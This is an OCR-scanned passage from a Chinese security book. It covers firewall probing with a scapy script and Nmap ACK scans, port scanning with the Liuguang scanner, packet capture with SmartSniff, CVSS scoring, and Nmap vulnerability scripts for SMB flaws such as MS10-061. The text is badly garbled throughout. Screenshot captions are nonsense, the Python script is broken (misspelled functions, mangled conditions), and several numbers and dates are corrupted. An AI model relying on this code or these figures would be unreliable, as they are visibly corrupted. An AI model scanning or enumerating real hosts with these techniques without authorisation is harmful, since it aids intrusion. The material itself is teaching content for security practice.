192.168.1.105。 其 中 ，-u 参 数 指定 用 户 名 字 
典 文件 。 


11.2.6 ”探测 主机 防火 墙 


通过 对 数据 包 的 发 送 ， 并 检查 返回 
数据 包 ， 可 以 推断 出 哪些 端口 是 被 防火 墙 
过 滤 了 。 这 个 只 能 作为 一 种 推断 结果 ， 会 
存在 一 定 误差 。 探 测 规则 第 一 次 发 送 SYN 
包 ， 第 二 次 发 送 ACK 包 ， 总 体会 存在 以 下 4 
种 情况 : 

第 1 种 : 发 送 SYN 包 没有 返回 ， 发 送 
ACK 包 回复 RST， 存 在 过 滤 。 

第 2 种 : 发 送 SYN 包 回复 SYN/ACK 或 
者 SYN/RST， 发 送 ACK 包 不 回复 ， 存 在 

第 3 种 : 发 送 SYN 包 回复 SYN/ACK 或 
者 SYN/RST， 发 送 ACK 包 回复 RST， 可 能 
是 开放 状态 ， 不 存在 过 滤 。 

第 4 种 : 发 送 的 数据 包 均 无 回应 ， 端 口 


1. scapy 工 具 


给 出 一 段 脚 本 ， 使 用 该 脚本 推断 端口 
是 否 被 防火 墙 过 滤 。 有 具体 代码 如 下 : 


#1!1Vusr/Vbin/Vpython 
from scapy.all import* 
Import logging 
logging.getLogger("scapy.runtime"). 
setLevel (lo0ogging .ERROR) 
from scapy.all import* 
if lenl(sys.argv) !=3: 
print "Usage EWIdebest By 
[Target IP] [Target Port]" 
BrEint “Examnple 
A 7 
print"Example will perform if filtering 
exists on port 80 of host 192.168.1.1 ” 
SYS .exit() 


tetas ny 


ip = sys.argv[1]  # 获 取 IP 地 址 

port = int (sys.argv[2]) # 获 取 端 口 

# 构 建 ACK 数 据 包 

ACK response = srl(IP(dst=ip)/TCP (dp 
ort=port,flags="A'),timeout=1,vVverbose=0) 
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# 构 建 SYN 数 据 包 

SYN response= srl(IP(dst=ip)/TCP (dpo 
rt=port,flags="'S"'),timeout=]1,verbose=0) 

# 如 果 ACK、SYN 包 返回 都 是 空 端口 关闭 状态 

if ((ACK response==None)and(SYN 
response==None)): 

print" ”Port is either unstatefulty 

filltered or host is down" 

# 如 果 ACK 或 者 SYN 两 个 返回 值 有 一 个 为 空 ， 并且 
不 是 两 个 返回 值 不 同时 为 空 

elif ((ACK response==None)or(SYN 
response==None)) LACEK: 
response==None)and(SYN response==None)): 


anG ICTE 


print "Stateful filtering in place" 


# 存 在 过 滤 
村 ER 
flags)==18: # 回 复 SYN/ACK 端 口 开 放 


print "Pot is unfiltered and open" 


Se esoonsel Tepels 
Hagsl==20: # 回 复 RST/ACK 端 口 关 闭 
print "Port is unfiltered and 
closed™" 
else: 


print "Unable to determine if 七 he 


# 其 余 情 况 存在 过 滤 


port is filtered" 


2. Nmap 工 具 


使 用 Nmap 工 具 对 防火 墙 进行 扫描 ， 具 
体操 作 步 又 如 下 : 
扫描 80 端 口 ， 使 用 Nmap -sA 192. 
168.1.1 -p 80 人 命令。 执行 效果 如 下 图 所 示 ， 
可 以 看 到 80 端 口 没有 被 过 滤 。 


root@kali:~/Test/Service# nmap -SA 1I92.168.I.I -p 86 
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-28 06:07 EDT 
Nmap scan report for 192.168.1.1 
Host is up (6.00054s Latency 1 . 


PORT STATE SERVICE 
BO/tcp unfiltered http 
MAC Address: 1C:FA:68:91:2F:08 (Tp-link Technologies) 


Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds 


扫描 其 他 端口 ， 如 果 使 用 Nmap -SA 
192.168.1.1 -p 445 人 命令， 执行 效果 如 下 图 所 
示 ， 可 以 看 到 445 端 口 存在 过 滤 ， 并 给 出 了 
相应 的 提示 信息 。 


root@kali:~/Test/Service# nmap -SA 192.168.1.1 -p 445 
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-28 96:07 EDT 
Nmap scan report for 192.168.1.1 
Host is up (6.00032s Latency 1 . 


PORT STATE SERVICE 
445/tcp filtered microsoft-ds 
MAC Address: 1C:FA:68:91:2F:08 (Tp-link Technologies) 


Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds 


实战 演练 1 一 一 扫 拉 目标 主机 的 开放 端口 


流光 扫描 器 是 一 款 非常 出 名 的 中 文 多 
功能 专业 扫描 器 ， 其 功能 强大 、 扫 描 速度 
快 、 可 靠 性 强 ， 为 广大 黑客 迷 们 所 钟爱 。 
利用 流光 扫描 器 可 以 轻松 探测 目标 主机 的 
开放 端口 。 下 面 将 以 探测 POP3 主 机 的 开放 
端口 为 例 进行 介绍 。 

单 击 桌面 上 的 流光 扫描 器 程序 图 标 ， 
启动 流光 扫描 器 ， 如 下 图 所 示 。 
里 小 墟 次 伯 -【 诉 光 5.0】 Build 3310 (0 用 户 ) 一 口 X 


文 位 [F] ” 扎 息 iE】 坦 吾 (W) 系 草 (IR) 迹 项 [O] 工具 人 MT 帮助 (H) 关于 (A) 
梯 0Hia 录 查找 : 巨 


I 


口 呈 FoF5 主 机 

:… 口 和 0 IMAP 主机 
口 个 FP 主机 

… 口 人 @ HTTP 主 机 
口 静 =RoxY 主 机 

一 口 蚂 FORM 主机 
口 吕 ss 主机 


一 口 多 解码 字典 式 方 实 v 
主机 | 条 统 纪 本 | 类 型 


| 摘 壕 - 


大 作 山 虐 权 斯 育 


区 小 棚 坎 件 3RBE 宝 1935-2002 小 
密码 主机 


忠 码 


[用户 间 辣 于 程 探 列 和 速度 


单 击 “选项 ”一 “系统 设置 ”菜单 
命令 ， 打 开 “ 系 统 设置 ”对 话 框 ， 对 优先 
级 、 线 程 数 、 单 词 数 /线程 及 扫描 端口 进行 
设置 ， 如 下 图 所 示 。 


系统 设置 
线程 设置 端口 
较 高 80 3 POP3: HTTP: 80 


下 


优先 级 


i SMTP:; 25 


PROXY |8080 SQL: 1433 


线程 雪 单词 烤 语 各 
站 自动 调整 线程 设置 |_ 确定 (0) | | 取消 | 
在 扫描 器 主 窗 口中 选中 “HTTP 主 
机 ” 复 选 框 ， 然 后 右 击 ， 在 弹出 的 快捷 菜 
单 中 选择 “编辑 ”一 “添加 ”选项 ， 如 下 
图 所 示 。 
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四 小 起 次 后-【 诉 光 5.0】 Build 3310 (0 用 户 ) 一 口 X 
文 位 [F] ” 编 乱 (E】 坦 吾 (V) 么 测 (R) 这 而 [DO) 工具 (者 劲 (H) 关于 [A) 
探 串 记录 查找 ; 了 | 


HTTP 3 
:- 口 更 FRoxY 和 饭 斌 》 护 司 .. 


口 吉 Mssa 查看 > 添加 .… ~\ 
GE- 口 塑 畦 由 主机 。 SS 和 从 列 去 活力.。 

口 量 sm 
; 口 淆 IFPCS 主 台山 》 人 广 站 证 站 

解码 闻 典 5 
- De x 琛 出 ? 删除 选中 分 支 . = 
主机 | 换 壕 
到 作 》 ti 一 三 六 


区 小 相 欣 件 实 婉 室 1935-2002 小 术 作 品 板 权 所 站 
用 户 吕 EE [主机 


| p= 用 户 中 问 30 探 负 种 度 


打开 “添加 主机 (HTTP) ”对 话 
框 ， 在 该 对 话 框 的 下 拉 列 表 框 中 输入 要 扫 
描 主 机 的 JP 地 址 〈 这 里 以 192.168.0.105 为 
例 ) ， 如 下 图 所 示 。 


漆 加 主机 (HTTP) 


| 192.168.0.10 引 | 
四 自动 更 新 主机 列表 他) 四 使 用 自动 完成 功能 多 


| 确定 (0) | 


取消 (C) | 


此 时 ， 在 主 窗口 中 将 显示 出 刚刚 添加 
的 HTTP 主 机 ， 右 击 此 主机 ， 在 弹出 的 快捷 
菜单 中 依次 选择 “探测 ”一 “扫描 主机 端 
口 ” 菜 单 命令 ， 如 下 图 所 示 。 


辆 小 榨 坎 件 -【 沪 光 5.0】 Build 3310 (0 后 户 ) 一 口 
文件 肯 ” 弓 沪 IE) 音 志 [(V) 第 (R) 还 及 IOJ 工 吕 TM 大 动 [H] 关子 (A) 


检测 主机 类 型 _ 
探测 徙 广告 乌 (Finger),.. 


Sun Solaris 用 户 列 记 {Finger). 


单 问 80 挥 济 | 讲 度 


打开 “端口 探测 设置 ”对 话 框 ， 在 该 
对 话 框 中 选中 “ 自 定 义 端口 探测 范围 ” 复 
选 框 ， 然 后 在 “范围 ”选项 区 中 设置 要 探 
测 端 口 的 范围 ， 如 下 图 所 示 。 
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污 口 探 于 和 单 南 桌面 上 的 SmartSniff 程 序 图 标 ， 
国 自 定义 濡 口 探 刘 党 图 - pp ~ Xk 一 
ee 打开 SmartSniff 程 序 主 窗口 ， 如 下 图 所 示 。 
探 出 端口 范围 从 : |100 到 |sooo BR smartSniff 一 口 xX 

文件 (F) 编 辐 (E) 视图 (V) 选项 (0O) 帮助 (H) 


|_ 确定 (0) | | 取消 @ | p> | 


索引 协议。 本 地 地 址 
[step 园 设置 完成 后 ， 单 去 “确定 ”按钮 ， 开 
始 探测 目标 主机 的 开放 端口 ， 如 下 图 所 示 。 


二 小 析 软 件 - 【流光 5.0】 Build 3310 (0 月 户 ) 

文件 虽 ” 编 赎 (E) 查 去 [V) 。 么 调 (R) 迁 项 (0] 工 呈 (TT) 夺 助 [(H】 关于 (A) 

UR | 

: 口 合 Fr 主机 

; 日 了 旧名 HTTP 主机 

wis2. 158 
. 口 话 PROXY 主 机 
- 口 吕 FORM 主机 
口 起 Msset 主机 


日 口 江 | 
ee Fy 


本 > 芝 有 


吕 Ds 探 刑 历史 纪录 
-- 口 局 192.158.0,105 v 


a 系统 睛 本 “| 类 到 


远程 江口 


本 地 洋 口 


单 击 “开始 捕捉 ”按钮 或 按 F5 键 ， 开 
ey gap 多 服务 器 之 间 传 输 的 
数据 包 ， 如 下 图 所 示 。 


[入 小 档 软件 严 妨 室 1995-2002 小 裕 作 品 版 权 所 有 


用 户 名 中 IE 
好 smartsnif 一 口 X 
文件 (有 ”编辑 (E) 视图 (V) 选项 (O) ”帮助 (H) 
+ 用 户 单 癌 80 挥 济 妥 度 | 国 
二 后 壶 引 协议 本 地 地 址 远程 地 址 本 地 端口 远程 端口 个 
扫描 完 年 ， 将 会 自 动 弹 出 “ 探 探测 结 @1 UDP 192.168.0.105 123.151.78.54 4022 8000 
» 2 TCP 192.168.0.105 125.88.219.247 3255 443 
对 话 框 ， 如 果 目 标 主机 存在 开放 端口 ， @93 TCP 192.168.0.105 180.149.131.35 3388 443 
让 会 存 访 对 二 辟 示 由: 二 4 TCP 192.168.0.105 180.149.131.35 3389 443 
就 会 在 该 | 话 框 和 显示 出 来 ， 如 下 图 所 示 。 5 TCP 192.168.0.105 125.77.198.152 53891 80 v 


探 训 结果 
开放 端口 : 


主机 492.158.0.105 端 口 0080..， OR 
主机 雪 2.158.0.105 端 口 0080.,,. 开 局 (HTTP 


pr 


实战 演 
据 包 


SmartSniff 工 具 可 以 让 用 户 捕获 目 己 
的 网 络 适配器 的 TCP/IP 数 据 包 ， 并 且 可 以 
按 顺 序 查 看 客户 端 与 服务 器 之 间 会 话 的 数 
据 。 用 户 可 以 使 用 ASCII 模 式 (用 于 基于 
文本 的 协议 ， 如 HTTP、SMTP、POP3 与 
FTP) 、 十 六 进 制 模式 来 查看 TCP/IP 会 话 
(用 于 基于 非 文 本 的 协议 ， 如 DNS) 。 

利用 SmartSmiff 捕 获 TCP/IP 数 据 包 的 具 
体操 作 步 又 如 下 : 


有 练 2 一 一 捕获 网 络 中 的 TCP/IP 数 


200 


已 经 捕获 27 个 数据 包 


单 击 “ 停 止 捕获 ”按钮 或 按 F6 键 ， 停 


止 捕获 数据 ， 在 列表 中 选择 任意 一 个 TCP 类 
型 的 数据 包 ， 即 可 和 碍 看 其 数据 信息 ， 如 下 
图 所 示 。 


只 Smarcnif —- 口 x 

| 文件 ”编辑 [E) 视图 (V) 选项 (O) 帮助 (H) 

| | 

LA Ne I 
本 地 地 址 远程 地 址 
192.168.0.106 192.163.0.255 
192.168.0.105 183.60.16.208 
192.168.0.105 119.147.201.44 
192.168.0.105 125.76.247.199 
192.168.0.105 125.76.247.199 
192.168.0.105 01.128.114.134 
192.168.0.105 120.55.88244 3511 


DESKTOP-SCVE... 

DESKTOP-67NQ... 
DESKTOP-67NQ... 
DESKTOP-67NQ... 


DESKTOP-67NQ... 
DESKTOP-67NQ... 
DESKTOP-67NQ.. 


866666699 CA 0F 8@1 69 68 91 88 96 866 68 90 86 63 77 77 77 so。 
BID 8 77 65 68 61 6D bn 5 72 82 63 6E GH GA G1 10 
6806066626 61 


-wehamme rF.cn 


80066669 CA boF 81 86 69 91 868 091 868 699 68 80 63 77 77 77 和 eeae aaeas 


B8866016 68 77 65 68 61 56D 6D 65 72 62 63 6E 606 66 891 Ba -Wehamme r.cn ™ 
< > 


I 
| 总 共 44 个 TCPJIP 会 活 , 已 迁 择 1 个 


在 列表 中 选择 任意 一 个 UDP 类 型 的 数 
据 包 ， 即 可 查看 其 数据 信息 ， 如 下 图 所 示 。 


ER smartsniff 一 口 x 
文件 (R” 编 蝶 (E) 讽 图 (V) 选项 (0) ” 孝 助 (H) 
> 办 | 口 加 名 儿 站 
本 地 地 址 远程 地 址 本 地 庄 口 
192.168.0.106 192.168.0.255 138 


远程 端口 本 地 主机 
DESKTODP-5CVB.. 
DESKTOP-67NO.,., 
DESKTOP-67NQ... 
DESKTOP-67NQ... 
DESKTOP-67NQ... 
DESKTOP-67NQ... 
DESKTOP-67NQ... 


183,60,16.208 
192.168.0.105 119.147.201.44 
192.168.0.105 125.76.247.199 
192.168.0.105 125.76.247.199 
192.168.0.105 61.128.114.134 
192.168.0.105 120.55.88.244 


B8888688686 62 63 66 69 86 48 13 89 A 08 66 66 33 ED 61 688 
Beeboote 66 91 E3 34 E2 39 BB 56 B5 4B BS8 8A 58 80 45 85 
B88868620 DB 66 BB 39 DD EF BE SC Fé nn EG BD h7 C2 GC 99 fo 。。。。 
BA888830 A9 1B 24 EB uD AF 61 59 72 16 1E 9F 6 1D hh 6568 
BABBBGGL40 CD DB E6 DS BD C6 BA 77 96 5F A3 10 69 Hh B85 hh 
88808858 11 BA 63 se he 
< 


息 共 44 个 TCP/IP 会 话 , 已 远 硅 1 个 


[sep 图 在 列表 中 选中 任意 一 个 数据 包 ， 单 去 
“文件 ”一 “属性 ”菜单 命令 ， 在 弹出 的 
“属性 ”对 话 框 中 可 以 查看 其 属性 信息 ， 
如 下 图 所 示 。 

了 YX 


索引 : 138 
协议 : UDP 


本 地 地 址 : 1192.168.0.105 
远程 地 址 : |183.60.16.208 | 
本 地 端 D: 5000 
远程 端口 : 
本 地 主机 : IDESKTOP-67NQBIF.DHCP HOST | 
远程 主机 : 

服务 名 称 : | ] 
包 : lz | 
数据 大 小 : |126 字 节 
g 大 小 [ss 
数据 速 束 : I11KBi 种 | 
捕获 时 则 : [20171811518:39:29:856 | 
最 后 包 体 时 间 : |20171811518:39:29:966 | 
进程 ID: [| | 
进程 文件 名 | | 
进程 用 户 : | 
加 栽 MAC 地 址 : | | 
远程 MAC 地 址 : | 
本 地 IP 国 容 | | 
远程 IP 国 容 : | 
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在 列表 中 选中 任意 一 个 数据 包 ， 单 击 
“视图 ”一 “网 页 报告 -TCP/IP 数 据 流 ” 
令 ， 即 可 以 网 页 形式 查看 数据 流 报 告 ， 
下 图 所 示 。 


©, 煞 迫 汽 捐 去 x | 十 召 一 口 x 
[ 合 加 file:///D:W360 安 全 浏 和 ~ 。 志 此 扒 误 避 上 口 中 .三 
D> 育 收 襄 、 日 手 机 收 苞 夫 民 .X-P 网 .四 骆 


数据 流 报告 


| 合 歌 力 网 二 大 全 ， 口 


索引 所 


| 协议 [ue 
[本 地 地 址 。 “| 192. 168.0. 105 
| 远 杠 地址。 | 61. 128. 114. 134 


aa | 
| 本 地 主 [nasrroP- -B7NOQBIF. DHCP HOST 
en EEE TT xj. telecom com 


今日 优 运 六 日 优 拓 。 @) 信 日 直 肝癌 冰点 新 间 风 站 同 涩 霹 新 闻 赐 观 加 本 Tf 载 巴 内 上 口 : Q 100% , 


11.4 小 试 映 手 
扫描 主机 的 各 种 端口 。 
扫描 主机 的 Banner 信 息 。 
扫描 主机 的 常见 协议 。 
探测 主机 的 防火 墙 。 


练习 1: 
练习 2: 
练习 3: 
练习 4: 
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第 12 草 ”无 线 网 络 中 主机 漏洞 的 
安全 防护 


漏洞 是 在 硬件 、 软 件 、 协 议 的 具体 实现 或 系统 安全 策略 上 存在 缺陷 ， 从 而 可 以 使 攻 
击 者 能 够 在 未 授权 的 情况 下 访问 或 破坏 系统 。 本 章 介 绍 如 何 对 无 线 网 络 中 的 主机 进行 漏洞 


扫描 ， 主 要 包括 系统 漏洞 概述 、 系 统 漏 洞 评 分 标准 


CVSS、 使 用 Nmap 扫 描 漏洞 、 使 用 


OpenVAS 扫 描 漏 洞 、 使 用 Nessus 扫 描 漏 洞 、 系 统 漏 洞 的 安全 防护 等 。 


计算 机 系统 漏洞 也 被 称 为 系统 安全 缺 
陷 。 这 些 安全 缺陷 会 被 技术 高 低 不 等 的 入 
侵 者 所 利用 并 达到 控制 目标 主机 或 造成 一 
些 更 具 破 坏 性 的 目的 。 


12.1.1 系统 漏洞 的 定义 


系统 漏洞 是 指 应 用 软件 或 操作 系统 软 
件 在 逻辑 设计 上 的 缺陷 ， 或 在 编写 时 产 
生 的 错误 ， 共 个 程序 (包括 操作 系统 ) 


Ee 
” 毒 等 方式 来 攻击 或 控制 整个 计算 机 ， 从 而 


锁 取 计算 机 中 的 重要 资料 和 信息 ， 甚 至 破 
坏 系 统 。 

系统 漏洞 又 称 安全 缺陷 ， 可 对 用 户 造 
成 不 民 后 果 。 如 系统 漏洞 被 恶意 用 户 利 用 ， 
会 造成 信息 泄露 ， 黑 客 攻 击 网 站 即 利用 网 络 
服务 器 操作 系统 的 漏洞 ， 对 用 户 操作 造成 不 
便 ， 如 不 明 原 因 的 死机 和 丢失 文件 等 。 


12.1.2 ”系统 漏洞 产生 的 原因 

系统 漏洞 的 产生 不 是 安装 不 当 的 续 
果 ， 也 不 是 使 用 后 的 结果 ， 它 受 编 程 人 员 
的 能 力 、 经 验 和 当时 安全 技术 所 限 ， 在 程 
序 中 难免 会 有 不 足 之 处 。 

归结 起 来 ， 系 统 漏 洞 产 生 的 原因 主要 
有 以 下 几 挟 : 


(1) 人 为 因素 。 编 程 人 员 在 编写 程序 
过 程 中 故意 在 程序 代码 的 隐蔽 位 置 保留 了 
后 门 。 

(2) 硬件 因素 。 因 为 硬件 的 原因 ， 编 
程 人 员 无 法 弥补 硬件 的 漏洞 ， 从 而 使 硬件 
问题 通过 软件 表现 出 来 。 

(3) 客观 因素 。 受 编程 人 员 的 能 力 、 
经 验 和 当时 的 安全 技术 及 加 密 方 法 所 限 ， 
在 程序 中 不 免 存 在 不 足 之 处 ， 而 这 些 不 足 
恰恰 会 导致 系统 漏洞 的 产生 。 


12.2 ”系统 漏洞 评分 标准 一 一 
CVSS 


通用 弱点 评价 体系 (CVSS) 是 由 
NIAC 开 发 、FIRST 维 护 的 一 个 开放 并 且 能 
够 被 产品 厂商 免费 采用 的 标准 。 利 用 该 标 
准 ， 可 以 对 弱点 进行 评分 ， 进 而 帮助 我 们 
判断 修复 不 同 弱 点 的 优先 等 级 。 


12.2.1 CVSS 简 介 


CVSS (Common Vulnerability Scoring 
System 通用 漏洞 评分 系统 ) 是 一 个 行业 公 
开标 准 。 可 以 帮助 人 们 建立 衡量 漏洞 严重 
程度 的 标准 ， 使 得 人 们 可 以 比较 漏洞 的 严 
重 程度 ， 从 而 确定 处 理 它们 的 优先 级 。 

CVSS 得 分 基于 一 系列 维度 上 的 测量 
结果 ， 这 些 测 量 维度 被 称 为 量度 (Met- 


rics) 。 漏 洞 的 最 终 得 分 最 大 为 10， 最 小 为 
0。 得 分 在 7 一 10 中 的 漏洞 是 高 危 漏 洞 通常 
被 认为 比较 严重 ， 得 分 在 4 一 6.9 中 的 是 中 级 
漏洞 ， 得 分 在 0 一 3.9 中 的 则 是 低级 漏洞 。 

CVSS 系 统 包 括 三 种 类 型 的 分 数 : 基本 
分 、 暂 时 分 和 环境 分 。 其 中 ， 基 本 分 和 和 暂 
时 分 通常 由 安全 产品 卖主 、 供 应 商 给 出 ， 
因为 他 们 能 够 更 加 清楚 地 了 解 漏洞 的 详细 
信息 ; 环境 分 通常 由 用 户 给 出 ， 因 为 他 们 
能 够 在 自己 的 使 用 环境 下 更 好 地 评价 该 漏 
洞 存在 的 潜在 影响 。 


12.2.2 《VS9 计 算 方法 


CVSS 有 目 己 的 一 套 漏 洞 评 分 计算 方 
法 ， 但 也 有 一 些 指标 具有 不 确定 性 和 复杂 
性 ， 会 导致 完全 的 定量 分 析 困 难 。 它 采用 3 
个 客观 性 指标 和 11 个 主观 性 指标 。 


1. 基本 评价 


基本 评价 指 的 是 该 漏洞 本 喘 固有 的 一 
些 特点 ， 及 这 些 特 点 可 能 造成 的 影响 评价 
分 值 。 

(1) 攻击 途径 (AccessVector) 。 如 果 
是 本 地 攻击 给 0.7， 可 以 远程 攻击 给 1.0。 

(2) 攻击 复杂 度 (AccessComplexity) 。 
分 为 3 个 标准 分 别 是 低 、 中 、 高 ， 给 出 的 
分 值 为 0.6、0.8、1.0。 

(3) 认证 (Authentication) 。 需 要 认证 
给 0.6， 不 需要 认证 给 1.0。 

(4) 机 密 性 (ConfImpact)。 不 受 影响 
给 0， 部 分 影响 0.7， 完 全 影响 1.0。 

(5) 完整 性 (IntegImpact) 。 不 受 影 啊 
给 0， 部 分 影响 0.7， 完 全 影响 1.0。 

(6) 可 用 性 (AvailImpact)。 不 受 影响 
给 0， 部 分 影响 0.7， 完 全 影响 1.0。 


2. 生命 周期 评价 


生命 周期 评价 是 针对 最 新 类 型 漏洞 
(如 0day 漏 洞 ) 设置 的 评分 项 ， 因 此 SQL 注 
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入 漏洞 不 用 考虑 。 这 里 列举 出 了 3 个 与 时 间 
紧密 关联 的 要 素 ， 具 体 介 绍 如 下 : 

(1) 可 利用 性 。 未 证 明 0.85， 概 念 证 
明 0.9， 功 能 性 0.95， 完 全 代码 1.0。 

(2) 修复 措施 。 官 方 补 丁 0.87， 临 时 
补丁 0.9， 临 时 解决 方案 0.95， 无 措施 1.0。 

(3) 确认 程度 。 不 确认 0.9， 未 经 确认 
0.95， 己 确认 1.0。 


3. 环境 评价 


每 个 漏洞 会 造成 的 影响 大 小 都 与 用 户 
自身 的 实际 环境 密 不 可 分 ， 因 此 可 选项 中 
也 包括 了 环境 评价 。 可 以 由 用 户 自 评 。 

(1) 危害 影响 程度 。 无 0.0， 低 0.1， 
中 0.3， 高 0.5。 

(2) 目标 分 布 范 围 。 无 0.0， 低 0.25， 
中 0.75， 高 1.0 (0、1% 一 15%、16% 一 
49%、50% ~ 100%) 。 

评分 与 危险 等 级 对 应 如 下 : 

e [0，4): 被 认为 是 低级 威胁 。 

e [4，7): 被 认为 是 中 级 威胁 。 

e [7，10]: 被 认为 是 高 级 威胁 。 

不 同 机 构 按 照 CVSS 分 值 定义 威胁 
的 低 、 中 、 高 级 别 ，CVSS 体 现 漏洞 的 风 
险 ， 威 胁 级 别 表示 漏洞 风险 对 系统 的 影响 
程度 ，CVSS 分 值 是 工业 标准 ， 威 胁 级 别 


不 是 。 


12.3 ”使 用 Nmap 扫 描 漏 洞 


Nmap 目 带 有 大 量 脚本 ， 通过 脚本 配置 回 0 
规则 ， 并 配合 进行 漏洞 扫描 。 


12.3.1 脚本 管理 


Nmap 有 一 个 脚本 数据 库 文 件 ， 使 用 该 
数据 库 可 以 对 所 有 的 脚本 进行 分 类 管理 。 
得 看 脚本 数据 库 文件 的 方法 为 : 在 usrshare/ 
Nmap/scripts 目 录 中 有 一 个 script.db 文 件 。 
该 文件 用 于 维护 Nmap 所 有 脚本 文件 ， 在 
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黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


Kali Linux 命 令 执 行 窗口 中 输入 cat script.db 命 令 ， 即 可 查看 数据 库 内 容 ， 执 行 效果 如 下 
所 示 。 


root@kali:/usr/share/nmap/scripts# cat Script.db 
Entry { filename = "acarsd-info.nse", categories = { "discovery", "safe", } } 
Entry { filename = "address-info.nse", categories = { "default", "safe", } } 
sh { filename = "afp-brute.nse", categories = { "brute", "intrusive", } } 
ntry { filename = "afp-ls.nse", categories = { "discovery", "safe", } } 
Entry { filename = "afp-path-vuln.nse", categories = { "exploit", "intrusive", "vuln", } } 
Entry { filename = "afp-serverinfo.nse", categories = { "default", "discovery", "safe", } } 
Entry { filename = "afp-showmount.nse", categories = { "discovery", "safe", } } 
Entry { filename = "ajp-auth.nse", categories = { "auth", "default", "safe", } } 
ntry { filename = "ajp-brute.nse", categories = { "brute", "intrusive", } } 
Ee { filename = "ajp-headers.nse", categories = { "discovery", "safe", } } 


每 一 个 脚本 后 面 都 有 一 个 分 类 (categories) 人 信息， 分别 是 默认 (default) 、 发 现 
(discovery) 、 安 全 (safe) 、 暴 力 (brute) 、 入 侵 (intrusive) 、 外 部 的 (external) 、 
漏洞 检测 (vuln〉 、 漏 洞 利 用 〈exploit) 。 

另外 ， 如 果 执 行 less script.db | wc -1 命令， 可 以 查看 到 目前 Nmap 有 5S88 个 脚本 ， 如 下 图 
所 示 。 


root@kali:/usr/share/nmap/scripts# less Script.db | wc 1 
88 


网 提示 : 如 果 用 于 检测 ， 尽 量 挑选 safe 字 段 的 脚本 进行 扫描 ， 否 则 可 能 因为 扫描 导致 目标 
主机 系统 不 稳定 。 


12.3.2” 扫 摘 壮 示 


使 用 Nmap 的 脚本 文件 ， 可 以 扫描 系统 漏洞 ， 下面 以 smb-vuln-ms10-061.nse 脚 本 为 
例 ， 来 介 绍 使 用 Nmap 进 行 漏洞 扫描 的 方法 ，smb-vuln-ms10-061 是 Stuxnet 蜂 虫 病毒 利用 的 
4 个 漏洞 之 一 ， 该 漏洞 是 由 于 Print Spooler 权 限 配置 不 当 造 成 的 ， 这 个 漏洞 可 使 打印 请 求 在 
系统 目录 下 创建 文件 、 执 行 任意 代码 等 。 

使 用 Nmap 扫 描 漏洞 的 操作 步骤 如 下 : 
使 用 less script.db | grep smb-vuln 命 令 。 和 筛选 出 符合 标准 的 脚本 文件 ， 执 行 效果 如 下 
图 所 示 。 


root@kali:/usr/share/nmap/scripts# less script.db | grep smb-vutln 

Entry { filename = "smb-vuln-conficker.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } 
Entry { filename = "smb-vuln-cve-2917-7494.nse", categories = { "intrusive", "vuln", } } 

Entry { filename = "smb-vuln-cve2009-3103.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } 
Entry { filename = "smb-vuln-ms06-025.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } 
Entry { filename = "smb-vuln-ms07-029.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } 
Entry { filename = "smb-vuln-ms08-067.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } 
Entry { filename = "smb-vuln-ms106-054.nse", categories = { "dos", "intrusive", "vuln", } } 

Entry { filename = "smb-vuln-ms16-061.nse", categories = { "intrusive", "vuln", } } 

Entry { filename = "smb-vuln-ms17-01g.nse", categories = { "safe", "vuln", } } 

Entry { filename = "smb-vuln-regsvc-dos.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } 


使 用 cat smb-vuln-ms10-061.nse 命 令 。 查 看 该 脚本 的 帮助 信息 ， 执 行 效果 如 下 图 所 
示 ， 可 以 看 到 CVSS 评 分 达到 了 9.3 分 ， 因 此 这 个 漏洞 是 一 个 高 危 漏洞 。 


Host script results: 
| smb-vuln-ms19-B61: 
| VULNERABLE: 
Print Spooler Service Impersonation Vulnerability 


| 
| State; VULNERABLE 

| IDs: CVE:CVE-2010-2729 

| Risk factor: HIGH CVYSSv2: 9.3 [HIGH) (AV:N/AC:M/AU:N/C:C/I:C/A:C) 

| Description: 

| The Print Spooler service In Microsoft Windows XP,Server 2003 SP2,Vista,Server 2008，and 7, when printer sharing is enabled, 
| does not properly validate spooler access permissions, which allows remote attackers to create files in a system directory, 
| and consequently execute arbitrary code, by sending a crafted print request over RPC, as exploited in the wild in September 2810, 
| aka "Print Spooler Service Impersonation Vulnerability." 
| 

| 

| 

| 


Disclosure date: 2016-609-5 
References: 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2729 
| http://technet.microsoft.com/en-us/security/bulletin/MS16-961 
| http://blogs.technet.com/b/srd/archive/2810/89/14/ms10-061-printer-spooler-vulnerability,.aspx 
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如 果 通 过 smb-vuln-ms10-061.nse 脚 本 没有 发 现任 何 漏洞 。 还 可 以 尝试 使 用 smb-enum- 
shares.nse 脚 本 。 该 脚本 会 对 目标 主机 进行 枚 举 ， 发 现 所 有 可 能 存在 的 共享 。 使 用 less 
script.db | grep smb-enum 命 令 ， 得 选 出 该 脚本 文件 ， 执 行 效果 如 下 图 所 示 。 


root@kali:/usr/share/nmap/scripts# less script.db | grep smb-enum 

Entry { filename = "smb-enum-domains.nse", categories = { "discovery", "intrusive", } } 

Entry { filename = "smb-enum-groups.nse", categories = { "discovery", "intrusive", } } 

Entry { filename = "smb-enum-processes.nse", categories = { "discovery", "intrusive", } } 

Entry { filename = "smb-enum-services.nse", categories = { "discovery", "intrusive", "safe", } } 
Entry { filename = "smb-enum-sessions.nse", categories = { "discovery", "intrusive", } } 

Entry { filename = "smb-enum-shares.nse", categories = { "discovery", "intrusive", } } 

Entry { filename = "smb-enum-users.nse", categories = { "auth", "intrusive", } } 


使 用 Nmap -p445 192.168.1.105 --script=smb-enum-shares.nse 命 令 。 可 以 发 现 通过 枚 举 
脚本 发 现 目标 机 器 开放 445 端 口 ， 执 行 效果 如 下 图 所 示 。 


root@kali:/usr/share/nmap/scripts# nmap -p445 192.168.1.105 --script=smb-enum-shares.nse 
starting Nmap 7.790 ( https://nmap.org ) at 2018-10-29 65:35 EDT 
Nmap scan report for 192.168.1.105 

Host is up (60.60046s latency). 


PORT STATE SERVICE 
